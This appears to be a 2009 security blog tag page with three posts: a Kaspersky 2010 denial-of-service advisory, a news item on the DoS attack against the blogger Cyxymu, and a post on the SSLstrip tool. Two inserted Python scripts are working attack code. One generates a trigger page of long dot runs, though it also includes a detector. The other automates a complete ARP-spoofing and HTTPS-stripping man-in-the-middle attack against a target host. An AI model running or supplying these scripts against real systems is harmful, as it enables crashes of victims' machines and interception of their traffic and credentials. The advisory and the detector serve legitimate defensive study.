Posts tagged: DoS

Aug 31 2009

Kaspersky 2010 Remote Memory Corruption / DoS PoC

Description:
The vulnerability affects Kaspersky Internet Security 2010 9.0.0.459 and its sibling product, Kaspersky Anti-Virus 2010 9.0.0.463.

The issue was discovered on August 18, 2009.

The problem in both products appears when they parse a URL that contains a long run of consecutive dots. Kaspersky’s own avp.exe process climbs to 100% CPU. At first only the browser’s traffic is blocked; if enough consecutive dots are passed in the URL, the machine eventually crashes.

The trigger can be delivered in an HTML file as an ordinary href value or as an img src, and it also works inside HTML e-mail bodies, so it can be exercised remotely. The advisory characterizes the result as remote memory corruption leading to a denial of service.
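As an added example (not part of the original advisory or the milw0rm PoC), the following Python builds a local test page of the kind described above and, more usefully for defenders, scans HTML for href/src values whose longest run of dots exceeds a threshold, which is the check a mail gateway or proxy filter would apply. The dot count, hostname and threshold are assumed values; the advisory does not say how many dots are needed.

```python
import html
import re

# Constructed value: the advisory does not state how many consecutive dots are
# needed to trigger the hang, so DOT_COUNT is an assumed number for a local test page.
DOT_COUNT = 5000


def dotted_url(count=DOT_COUNT, host="example.invalid"):
    """Return a URL whose path is a run of `count` consecutive dots, the trigger the advisory describes."""
    return "http://%s/%s" % (host, "." * count)


def poc_html(count=DOT_COUNT):
    """Render a minimal page that references the dotted URL both as an href and as an
    img src, the two placements the advisory names."""
    url = html.escape(dotted_url(count), quote=True)
    return ("<html><body>\n"
            '<a href="%s">link</a>\n'
            '<img src="%s" alt="">\n'
            "</body></html>\n") % (url, url)


# Values of href= and src= attributes, double- or single-quoted.
_URL_ATTR = re.compile(r"\b(?:href|src)\s*=\s*(?:\"([^\"]*)\"|'([^']*)')", re.IGNORECASE)
_DOT_RUN = re.compile(r"\.+")


def longest_dot_run(url):
    """Length of the longest run of consecutive '.' characters in `url` (0 if none)."""
    return max((len(run) for run in _DOT_RUN.findall(url)), default=0)


def flag_urls(document, threshold=16):
    """Return (url, run_length) for every href/src value in `document` whose longest dot
    run is at least `threshold`. The threshold is an assumed policy value: legitimate URLs
    rarely contain more than two consecutive dots, so anything longer is suspicious."""
    flagged = []
    for m in _URL_ATTR.finditer(document):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        url = html.unescape(raw)
        run = longest_dot_run(url)
        if run >= threshold:
            flagged.append((url, run))
    return flagged


if __name__ == "__main__":
    page = poc_html(200)
    for url, run in flag_urls(page):
        print("flagged: %d consecutive dots in %s..." % (run, url[:40]))
```

The filter looks at the decoded attribute value, so entity-encoded dots are measured the same as literal ones; a filter that matched on the raw attribute text would be trivially bypassed.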

Tested on Products:

  • Kaspersky Internet Security 2010 9.0.0.459 (EN) with Mozilla Firefox in Windows XP Professional SP2 [en-US]
  • Kaspersky Anti-Virus 2010 [En] with IE8 in Windows XP Professional SP2 [en-US]

Proof of Concept: http://www.milw0rm.com/exploits/9537

Aug 08 2009

Twitter, Facebook attack targeted one user

A Georgian blogger with accounts on Twitter, Facebook, LiveJournal, and Google’s Blogger and YouTube was targeted in a denial-of-service attack that led to the site-wide outage at Twitter and problems at the other sites on Thursday, according to a Facebook executive.

The blogger, who uses the account name “Cyxymu,” (the name of a town in the Republic of Georgia) had accounts on all of the different sites that were attacked at the same time, Max Kelly, chief security officer at Facebook, told CNET News.

“It was a simultaneous attack across a number of properties targeting him to keep his voice from being heard,” Kelly said. “We’re actively investigating the source of the attacks, and we hope to be able to find out the individuals involved in the back end and to take action against them, if we can.”

Twitter was down for several hours beginning early Thursday morning, and it suffered periodic slowness and time-outs throughout the day.

Cyxymu’s LiveJournal page wasn’t accessible, but a cached version showed that it was updated on Thursday with a message about the denial-of-service, or DoS, attacks on his accounts on the United States-based sites. “Now it’s obvious it’s a special attack against me and Georgians,” said the message, in Russian.

The page also apologized for a spam e-mail campaign in which the sender address was spoofed to make the messages look as if he had sent them; screenshots are included. It’s unclear whether or how the spam campaign is related to the DoS attacks.

Facebook and Google were able to minimize any impact to their sites, including Blogger, YouTube, and Google Sites, a free Web site service. Facebook even managed to keep the Cyxymu account accessible to Web surfers from that region, Kelly said, though it was inaccessible to people in other geographic areas, including San Francisco.

Source: CNET News

Feb 26 2009

SSLstrip – HTTPS Stripping Attack Tool

This tool demonstrates HTTPS stripping attacks.
It transparently hijacks HTTP traffic on a network, watches for HTTPS links and redirects, then maps those links into either look-alike HTTP links or homograph-similar HTTPS links. It also supports modes for supplying a favicon that looks like a lock icon, selective logging, and session denial.

To get this running:
* Flip your machine into forwarding mode.
* Set up iptables to redirect HTTP traffic to sslstrip.
* Run sslstrip.
* Run arpspoof to convince a network they should send their traffic to you.

That should do it.

How does this work?
First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined for port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.
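The four setup steps and the forwarding/redirect explanation above, as an added example that is not part of the sslstrip distribution: a Python wrapper that runs the sequence with subprocess and, which the post leaves out, undoes it afterwards. The interface, victim and gateway addresses are assumed placeholders for a lab network you are authorized to test; the port is the $listenPort from the text. With dry_run=True it only prints and returns the commands.

```python
import signal
import subprocess

# Assumed values for illustration; replace with the interface, victim and gateway
# of the lab network you are authorized to test.
IFACE = "eth0"
TARGET = "192.0.2.10"     # victim host whose ARP cache we poison
GATEWAY = "192.0.2.1"     # the real router
LISTEN_PORT = 10000       # the $listenPort the post refers to


def redirect_rule(port, action="-A"):
    """iptables NAT rule sending inbound TCP/80 to sslstrip's listen port.
    action "-A" appends the rule, "-D" deletes the same rule again."""
    return ["iptables", "-t", "nat", action, "PREROUTING", "-p", "tcp",
            "--destination-port", "80", "-j", "REDIRECT", "--to-ports", str(port)]


def setup_commands(port=LISTEN_PORT):
    """Step 1 and 2: enable IP forwarding, then install the port-80 redirect."""
    return [
        ["sysctl", "-w", "net.ipv4.ip_forward=1"],
        redirect_rule(port, "-A"),
    ]


def attack_commands(iface=IFACE, target=TARGET, gateway=GATEWAY, port=LISTEN_PORT):
    """Step 3 and 4: the two long-running processes. sslstrip listens on `port`
    and logs to a file; arpspoof tells `target` that we are `gateway`."""
    return [
        ["sslstrip", "-l", str(port), "-w", "sslstrip.log"],
        ["arpspoof", "-i", iface, "-t", target, gateway],
    ]


def teardown_commands(port=LISTEN_PORT):
    """Undo the setup in reverse order: drop the NAT rule, then stop forwarding."""
    return [
        redirect_rule(port, "-D"),
        ["sysctl", "-w", "net.ipv4.ip_forward=0"],
    ]


def run(dry_run=True):
    """Execute the whole procedure (requires root). With dry_run=True, only print
    the commands in execution order and return them as a list."""
    plan = setup_commands() + attack_commands() + teardown_commands()
    if dry_run:
        for cmd in plan:
            print(" ".join(cmd))
        return plan

    for cmd in setup_commands():
        subprocess.run(cmd, check=True)
    procs = [subprocess.Popen(cmd) for cmd in attack_commands()]
    try:
        for p in procs:
            p.wait()
    except KeyboardInterrupt:
        pass
    finally:
        # SIGINT rather than SIGKILL: arpspoof re-ARPs the victim with the
        # gateway's real MAC on a clean exit, so the network is left as found.
        for p in procs:
            if p.poll() is None:
                p.send_signal(signal.SIGINT)
                p.wait()
        for cmd in teardown_commands():
            subprocess.run(cmd)
    return plan


if __name__ == "__main__":
    run(dry_run=True)
```

Only port 80 is redirected, exactly as the explanation says: everything else the victim sends is forwarded untouched, which is what keeps the victim's session usable while sslstrip rewrites the HTTPS links it sees in the plaintext pages.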

Download :
http://www.thoughtcrime.org/software/sslstrip/